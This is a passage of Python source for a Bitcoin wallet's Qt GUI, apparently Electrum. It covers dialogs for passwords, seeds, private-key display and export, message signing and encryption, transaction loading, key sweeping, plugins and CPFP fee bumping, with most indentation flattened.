self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.update_check_button = QPushButton("")
self.update_check_button.setFlat(True)
self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor))
self.update_check_button.setIcon(read_QIcon("update.png"))
self.update_check_button.hide()
sb.addPermanentWidget(self.update_check_button)
self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
self.lightning_button = None
if self.wallet.has_lightning():
self.lightning_button = StatusBarButton(read_QIcon("lightning.png"), _("Lightning Network"), self.gui_object.show_lightning_dialog)
self.update_lightning_icon()
sb.addPermanentWidget(self.lightning_button)
self.status_button = None
if self.network:
self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), self.gui_object.show_network_dialog)
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def create_coincontrol_statusbar(self):
self.coincontrol_sb = sb = QStatusBar()
sb.setSizeGripEnabled(False)
#sb.setFixedHeight(3 * char_width_in_lineedit())
sb.setStyleSheet('QStatusBar::item {border: None;} '
+ ColorScheme.GREEN.as_stylesheet(True))
self.coincontrol_label = QLabel()
self.coincontrol_label.setSizePolicy(QSizePolicy.Preferred, QSizePolicy.Preferred)
self.coincontrol_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
sb.addWidget(self.coincontrol_label)
clear_cc_button = EnterButton(_('Reset'), lambda: self.utxo_list.set_spend_list(None))
clear_cc_button.setStyleSheet("margin-right: 5px;")
sb.addPermanentWidget(clear_cc_button)
sb.setVisible(False)
return sb
def set_coincontrol_msg(self, msg: Optional[str]) -> None:
if not msg:
self.coincontrol_label.setText("")
self.coincontrol_sb.setVisible(False)
return
self.coincontrol_label.setText(msg)
self.coincontrol_sb.setVisible(True)
def update_lightning_icon(self):
if self.lightning_button is None:
return
if self.network.lngossip is None:
self.lightning_button.setVisible(False)
return
self.lightning_button.setVisible(True)
cur, total, progress_percent = self.network.lngossip.get_sync_progress_estimate()
# self.logger.debug(f"updating lngossip sync progress estimate: cur={cur}, total={total}")
progress_str = "??%"
if progress_percent is not None:
progress_str = f"{progress_percent}%"
if progress_percent and progress_percent >= 100:
self.lightning_button.setMaximumWidth(25)
self.lightning_button.setText('')
self.lightning_button.setToolTip(_("The Lightning Network graph is fully synced."))
else:
self.lightning_button.setMaximumWidth(25 + 5 * char_width_in_lineedit())
self.lightning_button.setText(progress_str)
self.lightning_button.setToolTip(_("The Lightning Network graph is syncing...\n"
"Payments are more likely to succeed with a more complete graph."))
def update_lock_icon(self):
icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
def change_password_dialog(self):
from electrum.storage import StorageEncryptionVersion
if self.wallet.get_available_storage_encryption_version() == StorageEncryptionVersion.XPUB_PASSWORD:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
self.logger.exception('')
self.show_error(repr(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_storage=encrypt_file)
except InvalidPassword as e:
self.show_error(str(e))
return
except BaseException:
self.logger.exception('Failed to update password')
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(32 * char_width_in_lineedit())
line2 = QLineEdit()
line2.setFixedWidth(32 * char_width_in_lineedit())
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def show_wallet_info(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(500, 100)
vbox = QVBoxLayout()
wallet_type = self.wallet.db.get('wallet_type', '')
if self.wallet.is_watching_only():
wallet_type += ' [{}]'.format(_('watching-only'))
seed_available = _('True') if self.wallet.has_seed() else _('False')
keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0)
grid.addWidget(QLabel(str(seed_available)), 3, 1)
if len(keystore_types) <= 1:
grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0)
ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
grid.addWidget(QLabel(ks_type), 4, 1)
# lightning
grid.addWidget(QLabel(_('Lightning') + ':'), 5, 0)
if self.wallet.can_have_lightning():
grid.addWidget(QLabel(_('Enabled')), 5, 1)
local_nodeid = QLabel(bh2u(self.wallet.lnworker.node_keypair.pubkey))
local_nodeid.setTextInteractionFlags(Qt.TextSelectableByMouse)
grid.addWidget(QLabel(_('Lightning Node ID:')), 6, 0)
grid.addWidget(local_nodeid, 6, 1, 1, 3)
else:
grid.addWidget(QLabel(_("Not available for this wallet.")), 5, 1)
grid.addWidget(HelpButton(_("Lightning is currently restricted to HD wallets with p2wpkh addresses.")), 5, 2)
vbox.addLayout(grid)
labels_clayout = None
if self.wallet.is_deterministic():
keystores = self.wallet.get_keystores()
ks_stack = QStackedWidget()
def select_ks(index):
ks_stack.setCurrentIndex(index)
# only show the keystore selector when the wallet has multiple keystores (e.g. multisig cosigners)
if len(keystores) > 1:
def label(idx, ks):
if isinstance(self.wallet, Multisig_Wallet) and hasattr(ks, 'label'):
return _("cosigner") + f' {idx+1}: {ks.get_type_text()} {ks.label}'
else:
return _("keystore") + f' {idx+1}'
labels = [label(idx, ks) for idx, ks in enumerate(self.wallet.get_keystores())]
on_click = lambda clayout: select_ks(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Select keystore"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
for ks in keystores:
ks_w = QWidget()
ks_vbox = QVBoxLayout()
ks_vbox.setContentsMargins(0, 0, 0, 0)
ks_w.setLayout(ks_vbox)
mpk_text = ShowQRTextEdit(ks.get_master_public_key(), config=self.config)
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
run_hook('show_xpub_button', mpk_text, ks)
der_path_hbox = QHBoxLayout()
der_path_hbox.setContentsMargins(0, 0, 0, 0)
der_path_hbox.addWidget(QLabel(_("Derivation path") + ':'))
der_path_text = QLabel(ks.get_derivation_prefix() or _("unknown"))
der_path_text.setTextInteractionFlags(Qt.TextSelectableByMouse)
der_path_hbox.addWidget(der_path_text)
der_path_hbox.addStretch()
ks_vbox.addWidget(QLabel(_("Master Public Key")))
ks_vbox.addWidget(mpk_text)
ks_vbox.addLayout(der_path_hbox)
ks_stack.addWidget(ks_w)
select_ks(0)
vbox.addWidget(ks_stack)
vbox.addStretch(1)
btn_export_info = run_hook('wallet_info_buttons', self, dialog)
btn_close = CloseButton(dialog)
btns = Buttons(btn_export_info, btn_close)
vbox.addLayout(btns)
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
r = self.gui_object.daemon.delete_wallet(wallet_path)
self.close()
if r:
self.show_error(_("Wallet removed: {}").format(basename))
else:
self.show_error(_("Wallet file not found: {}").format(basename))
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(repr(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase, config=self.config)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None, *,
help_text=None, show_copy_text_btn=False):
if not data:
return
d = QRDialog(
data=data,
parent=parent or self,
title=title,
help_text=help_text,
show_copy_text_btn=show_copy_text_btn,
config=self.config,
)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk = self.wallet.export_private_key(address, password)
except Exception as e:
self.logger.exception('')
self.show_message(repr(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk, config=self.config)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = ecc.verify_message_with_address(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
signature_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
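        """Decrypt the ciphertext with the key behind the given public key, off the GUI thread, and show the plaintext."""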
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
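        """Encrypt the message to the given public key and put the ASCII-encoded ciphertext into the Encrypted field."""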
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
except BaseException as e:
self.logger.exception('Invalid Public key')
self.show_warning(_('Invalid Public key'))
return
encrypted = public_key.encrypt_message(message)
encrypted_e.setText(encrypted.decode('ascii'))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
encrypted_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, data: Union[str, bytes]) -> Union[None, 'PartialTransaction', 'Transaction']:
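        """Parse transaction data in any format understood by tx_from_any; shows an error and returns None on failure."""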
from electrum.transaction import tx_from_any
try:
return tx_from_any(data)
except BaseException as e:
self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + repr(e))
return
def import_channel_backup(self, encrypted: str):
if not self.question('Import channel backup?'):
return
try:
self.wallet.lnbackups.import_channel_backup(encrypted)
except Exception as e:
self.show_error("failed to import backup" + '\n' + str(e))
return
def read_tx_from_qrcode(self):
from electrum import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(repr(e))
return
if not data:
return
# if the user scanned a bitcoin URI
if data.lower().startswith(BITCOIN_BIP21_URI_SCHEME + ':'):
self.pay_to_URI(data)
return
if data.lower().startswith('channel_backup:'):
self.import_channel_backup(data)
return
# else if the user scanned an offline signed tx
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self) -> Optional[Transaction]:
fileName = getOpenFileName(
parent=self,
title=_("Select your transaction file"),
filter=TRANSACTION_FILE_EXTENSION_FILTER_ANY,
config=self.config,
)
if not fileName:
return
try:
with open(fileName, "rb") as f:
file_content = f.read() # type: Union[str, bytes]
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason),
title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(
parent=self,
title=_('Input raw transaction'),
header_layout=_("Transaction:"),
ok_label=_("Load transaction"),
config=self.config,
)
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_text_channel_backup(self):
text = text_dialog(
parent=self,
title=_('Input channel backup'),
header_layout=_("Channel Backup:"),
ok_label=_("Load backup"),
config=self.config,
)
if not text:
return
if text.startswith('channel_backup:'):
self.import_channel_backup(text)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
raw_tx = self._fetch_tx_from_network(txid)
if not raw_tx:
return
tx = transaction.Transaction(raw_tx)
self.show_transaction(tx)
def _fetch_tx_from_network(self, txid: str) -> Optional[str]:
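        """Fetch a raw transaction by txid from the connected server; returns None (after informing the user) when offline or on error."""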
if not self.network:
self.show_message(_("You are offline."))
return
try:
raw_tx = self.network.run_from_another_thread(
self.network.get_transaction(txid, timeout=10))
except UntrustedServerReturnedError as e:
self.logger.info(f"Error getting transaction from network: {repr(e)}")
self.show_message(_("Error getting transaction from network") + ":\n" + e.get_message_for_gui())
return
except Exception as e:
self.show_message(_("Error getting transaction from network") + ":\n" + repr(e))
return
return raw_tx
@protected
def export_privkeys_dialog(self, password):
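        """Export all wallet private keys to a CSV or JSON file.

        Keys are derived in a background thread; progress and completion are
        reported to the dialog via Qt signals so the GUI stays responsive.
        """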
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It cannot be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(repr(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
os.chmod(fileName, 0o600)
            if is_csv:
                writer = csv.writer(f)
                writer.writerow(["address", "private_key"])
                for addr, pk in pklist.items():
                    writer.writerow(["%34s" % addr, pk])
            else:
                f.write(json.dumps(pklist, indent=4))
def do_import_labels(self):
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), self.wallet.import_labels, on_import)
def do_export_labels(self):
export_meta_gui(self, _('labels'), self.wallet.export_labels)
def import_invoices(self):
import_meta_gui(self, _('invoices'), self.wallet.import_invoices, self.invoice_list.update)
def export_invoices(self):
export_meta_gui(self, _('invoices'), self.wallet.export_invoices)
def import_requests(self):
import_meta_gui(self, _('requests'), self.wallet.import_requests, self.request_list.update)
def export_requests(self):
export_meta_gui(self, _('requests'), self.wallet.export_requests)
def import_contacts(self):
import_meta_gui(self, _('contacts'), self.contacts.import_file, self.contact_list.update)
def export_contacts(self):
export_meta_gui(self, _('contacts'), self.contacts.export_file)
def sweep_key_dialog(self):
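        """Ask for external private keys and a destination address, then prepare a transaction sweeping everything they control to that address."""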
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
hbox_top = QHBoxLayout()
hbox_top.addWidget(QLabel(_("Enter private keys:")))
hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
vbox.addLayout(hbox_top)
keys_e = ScanQRTextEdit(allow_multi=True, config=self.config)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk(*, raise_on_error=False):
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text, raise_on_error=raise_on_error)
def on_edit():
valid_privkeys = False
try:
valid_privkeys = get_pk(raise_on_error=True) is not None
except Exception as e:
button.setToolTip(f'{_("Error")}: {repr(e)}')
else:
button.setToolTip('')
button.setEnabled(get_address() is not None and valid_privkeys)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_address)
on_address(str(address_e.text()))
if not d.exec_():
return
# user pressed "sweep"
addr = get_address()
try:
self.wallet.check_address_for_corruption(addr)
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
privkeys = get_pk()
def on_success(result):
coins, keypairs = result
outputs = [PartialTxOutput.from_address_and_value(addr, value='!')]
self.warn_if_watching_only()
self.pay_onchain_dialog(coins, outputs, external_keypairs=keypairs)
def on_failure(exc_info):
self.on_error(exc_info)
msg = _('Preparing sweep transaction...')
task = lambda: self.network.run_from_another_thread(
sweep_preparations(privkeys, self.network))
WaitingDialog(self, msg, task, on_success, on_failure)
def _do_import(self, title, header_layout, func):
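        """Generic text-import helper: split the entered text on whitespace and pass the items to func,
        which must return (good_inputs, bad_inputs); both lists are summarised in message boxes."""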
text = text_dialog(
parent=self,
title=title,
header_layout=header_layout,
ok_label=_('Import'),
allow_multi=True,
config=self.config,
)
if not text:
return
keys = str(text).split()
good_inputs, bad_inputs = func(keys)
if good_inputs:
msg = '\n'.join(good_inputs[:10])
if len(good_inputs) > 10: msg += '\n...'
self.show_message(_("The following addresses were added")
+ f' ({len(good_inputs)}):\n' + msg)
if bad_inputs:
msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10])
if len(bad_inputs) > 10: msg += '\n...'
self.show_error(_("The following inputs could not be imported")
+ f' ({len(bad_inputs)}):\n' + msg)
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")+':'
self._do_import(title, msg, self.wallet.import_addresses)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title = _('Import private keys')
header_layout = QHBoxLayout()
header_layout.addWidget(QLabel(_("Enter private keys")+':'))
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
from .settings_dialog import SettingsDialog
d = SettingsDialog(self, self.config)
self.alias_received_signal.connect(d.set_alias_color)
d.exec_()
self.alias_received_signal.disconnect(d.set_alias_color)
if self.fx:
self.fx.trigger_update()
run_hook('close_settings_dialog')
if d.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
util.unregister_callback(self.on_network)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.db.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.wallet.db.put("qt-console-history", self.console.history[-50:])
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.timer.timeout.disconnect(self.timer_actions)
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p: Optional['BasePlugin'], name: str, i: int):
widget = settings_widgets.get(name) # type: Optional[QWidget]
if widget and not p:
# plugin got disabled, rm widget
grid.removeWidget(widget)
widget.setParent(None)
settings_widgets.pop(name)
elif widget is None and p and p.requires_settings() and p.is_enabled():
# plugin got enabled, add widget
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
# note: all enabled plugins will receive this hook:
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
full_name = descr['__name__']
prefix, _separator, name = full_name.rpartition('.')
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.logger.exception(f"cannot display plugin {name}")
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp_dialog(self, parent_tx: Transaction) -> None:
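        """Build a child-pays-for-parent transaction for an unconfirmed parent.

        The combined feerate shown to the user is (parent_fee + child_fee) divided by the
        total size of both transactions; the child fee is capped by the value of the
        unconfirmed output being spent back to the wallet.
        """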
new_tx = self.wallet.cpfp(parent_tx, 0)
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
parent_txid = parent_tx.txid()
assert parent_txid
parent_fee = self.wallet.get_tx_fee(parent_txid)
if parent_fee is None:
self.show_error(_("Can't CPFP: unknown fee for parent transaction."))
return
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
# FIXME with dyn fees, without estimates, there are all kinds of crashes here
combined_fee = QLabel('')
combined_feerate = QLabel('')
def on_fee_edit(x):
fee_for_child = fee_e.get_amount()
if fee_for_child is None:
return
out_amt = max_fee - fee_for_child
